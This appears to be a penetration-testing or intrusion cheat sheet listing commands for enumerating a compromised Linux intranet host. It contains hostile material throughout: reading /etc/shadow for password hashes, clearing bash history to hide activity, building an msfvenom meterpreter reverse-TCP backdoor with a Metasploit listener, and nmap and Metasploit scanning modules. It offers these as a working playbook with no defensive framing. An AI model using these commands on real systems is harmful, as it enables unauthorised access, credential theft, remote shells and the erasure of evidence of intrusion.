Linux Intranet Local Host Information Gathering Cheat Sheet

System type

cat /etc/issue
View the system name

Kernel version

uname -a #show all system information

Users

whoami
id
cat /etc/passwd #view the user list
cat /etc/shadow #get the user password hashes

Processes

ps aux #view process information

Network interfaces

/etc/network/interfaces #network interface information
ifconfig
route #view routes
arp -a #view cached address resolution entries

Service information

cat /etc/services #view the services that exist
cat /etc/services | grep ** #view the corresponding service

Service configuration

cat /etc/apache2/apache2.conf
cat /etc/my.cnf
cat /etc/httpd/conf/httpd.conf

Log information

/var/log
/var/log/apache2/access.log #HTTP log
/var/log/mysql/error.log #MySQL log
/var/log/apt/history.log #apt log

Command history

~/.bash_history
echo > .bash_history #clears file-based logs such as the one above
history #command history
history -c #clear the history

Software information

dpkg -l #list installed packages
rpm -qa #list installed packages

Generating a Linux backdoor

1. Example command:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell

2. Configure the Metasploit exploit listener

search exploit/handler  // (exploit/multi/handler: generic payload handler)
use exploit/multi/handler        // use the module
show options         // show the configuration
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp         // set the payload under test
exploit            // start listening

nmap scan:

nmap -sP -PI 192.168.1.0/24 -T4

Port scanning

auxiliary/scanner/portscan
scanner/portscan/ack ACK firewall scan
scanner/portscan/ftpbounce FTP bounce port scan
scanner/portscan/syn SYN port scan
scanner/portscan/tcp TCP port scan
scanner/portscan/xmas TCP "XMas" port scan

SMB scanning

Modules under scanner that help discover live hosts on the internal network:

  • auxiliary/scanner/discovery/arp_sweep

  • auxiliary/scanner/discovery/udp_sweep

  • auxiliary/scanner/ftp/ftp_version

  • auxiliary/scanner/http/http_version

  • auxiliary/scanner/smb/smb_version

  • auxiliary/scanner/ssh/ssh_version

  • auxiliary/scanner/telnet/telnet_version

  • auxiliary/scanner/discovery/udp_probe

  • auxiliary/scanner/dns/dns_amp

  • auxiliary/scanner/mysql/mysql_version

  • auxiliary/scanner/netbios/nbname

  • auxiliary/scanner/http/title

  • auxiliary/scanner/db2/db2_version

  • auxiliary/scanner/portscan/ack

  • auxiliary/scanner/portscan/tcp
